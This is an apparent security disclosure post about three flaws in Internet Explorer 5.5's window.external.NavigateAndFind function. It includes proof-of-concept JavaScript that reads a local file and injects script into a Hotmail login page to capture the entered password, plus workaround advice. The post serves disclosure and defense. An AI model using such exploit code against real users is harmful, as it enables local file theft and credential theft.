|
Multiple security vulnerabilities found in
window.external.NavigateAndFind function in IE5.5...
After the most recent patches applied the
vulnerabilities seem to persist.. Actually there is no
current issues discussed at microsft website...
Microsoft has been notified about the problem via
email.. Until now there is no response appearing.
I wanted to inform security concerned people about
the problem..
Vulnerability 1: window.external.NavigateAndFind
function can Access local files provided that the local
file name and path is known...
the code :(the I in the script tag replaced with
lowercase)
<A href="javascr!pt:LinkClicked()">Show local file's
Content</A>
<SCRiPT>
function LinkClicked()
{
b=window.open("file://C:/test.txt","local")
setTimeout('Sniff()',1000);
}
function Sniff(){
window.external.NavigateAndFind("javascript:alert
(document.body.innerText);","b","local");
}
</SCRiPT>
demonstration:
http://www.horoznet.com/AlpSinan/navAL.htm
vulnerability 2.window.external.NavigateAndFind
function can access other windows DOM.
editing the opened windows content, therefore code
injection, possible.
the code :
<A href="javascript:LinkClicked()">Go to Hotmail </A>
<scrIpt>
function LinkClicked()
{
a=window.open
("http://lc2.law5.hotmail.passport.com/cgi-
bin/login","new")
setTimeout('Spoof()',20000);// you may modify the
timeout....
}
function Spoof(){
window.external.NavigateAndFind
("javascript:document.write
(''+document.body.outerHTML+'<scrIpt>document.pa
sswordform.onsubmit=ShowPass;function
ShowPass(){alert(\"Your Password is: \n
\"+document.passwordform.passwd.value)};window.f
ocus();</sc'+'rIpt>');alert('The code has been injected
right now.');","a","new");
}
</scrIpt>
demonstration:
http://www.horoznet.com/AlpSinan/navCI.htm
vulnerability 3.
IE5.5 can execute the plain text files' javascript or
VBscript content...
demonstration:
http://www.horoznet.com/AlpSinan/execlocal.htm
Precautions or workarounds might be disabling
javascript or using caution while clicking the links in
untrusted webpages as well as popup windows.
Alp Sinan
|
